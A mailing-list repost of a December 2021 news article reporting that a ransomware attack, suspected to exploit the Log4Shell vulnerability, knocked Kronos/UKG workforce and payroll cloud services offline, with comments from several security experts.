[BreachExchange] Ransomware strikes workflow solutions provider Kronos via suspected Log4shell exploit

Tue Dec 14 09:49:08 EST 2021

https://siliconangle.com/2021/12/13/ransomware-strikes-workflow-solutions-provider-kronos-via-suspected-log4shell-exploit/

A ransomware attack has struck workflow management solutions provider
Kronos Inc. and knocked services offline.

UKG Inc., the parent company of Kronos, said today that the ransomware
attack could result in its services being out for “several weeks.” The
company even suggested that its customers should seek other ways to
facilitate payroll payments and human resources-related activities.

Notable Kronos customers include Tesla Inc., Marriott International Inc.,
Yamaha Corp., Aramark Corp., Samsung Electronics Co. Ltd. and Sony Music
Entertainment.

The ransomware attack specifically targeted the Kronos Private Cloud. The
attack also knocked offline UKG Workforce Central, UKG TeleStaff,
Healthcare Extensions and Banking Scheduling Solutions.

“At this time, we still do not have an estimated restoration time, and it
is likely that the issue may require at least several days to resolve,” UKG
said in a community post. “We continue to recommend that our impacted
customers evaluate alternative plans to process time and attendance data
for payroll processing, to manage schedules and to manage other related
operations important to their organization.”

Kronos did not reveal the form of ransomware involved in the attack.
Although the company did not provide details, reports suggest that the
ransomware attack exploited a Log4shell vulnerability. The Log4shell
vulnerability is related to the broad Log4j vulnerability gaining headlines
over the last few days.

Ars Technica noted today that Kronos’ cloud services rely heavily on Java,
the software framework that Log4j is based on. The Log4Shell vulnerability
allows attackers to deploy malicious code with elevated system privileges
and is described as trivially easy to exploit.

The Log4j vulnerability involves a flaw in the popular open-source tool for
collecting diagnostics data from applications written in the Java
programming language.

“With the Log4j vulnerability impacting many internet-facing systems,
Kronos/UKG may be old news soon,” James Shank, senior security evangelist
and chief architect of community services at threat intelligence company
Team Cymru Inc., told SiliconANGLE. “There are already reports of a variety
of actors using the Log4j exploit. Microsoft has already seen a common
precursor to ransomware, Cobalt Strike, landing on Log4j exploited systems.
It won’t be long before we hear of ransomware events tied to Log4j as the
initial vector.”

Michael Assraf, chief executive officer of vulnerability remediation
company Vicarius Ltd., noted that the way modern products are built is by
using a big hierarchy of dependencies. That means developers use libraries
written by third-party companies and engineers to speed up the software
release process.

Assraf said Log4j is an extremely basic library that allows log writing in
Java applications. The way Log4j vulnerability works is that it comes in
three layers: cloud products that directly use the Log4j, web applications
that use libraries employing Log4j and off-the-shelf software that’s
internally deployed on customer servers and endpoints. The first is where
Kronos has been hit by ransomware.

Kronos could be one of many companies to come. Paul Ducklin, principal
research scientist at security software company Sophos group plc, said
there’s a “staggering number of different ways that the Log4Shell ‘trigger
text’ can be encoded, the huge number of different places in your network
traffic that these strings can appear, and the wide variety of servers and
services that could be affected are collectively conspiring against all of
us.”

Even with the best of intentions, including serious deployment of
cybersecurity measures, Log4shell and Log4j is so serious because it
bypasses many traditional protection solutions.

“Although Kronos Private Cloud was secured by firewalls, encrypted
transmissions and multifactor authentication, cybercriminals were still
able to breach and encrypt its servers,” explained Nick Tausek, security
solutions architect at security automation company Swimlane Inc. “This
extended shutdown will likely present challenges for many organizations as
they seek to roll out bonuses and employees look to request time off ahead
of the holidays.”
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20211214/bda1fa8a/attachment.html>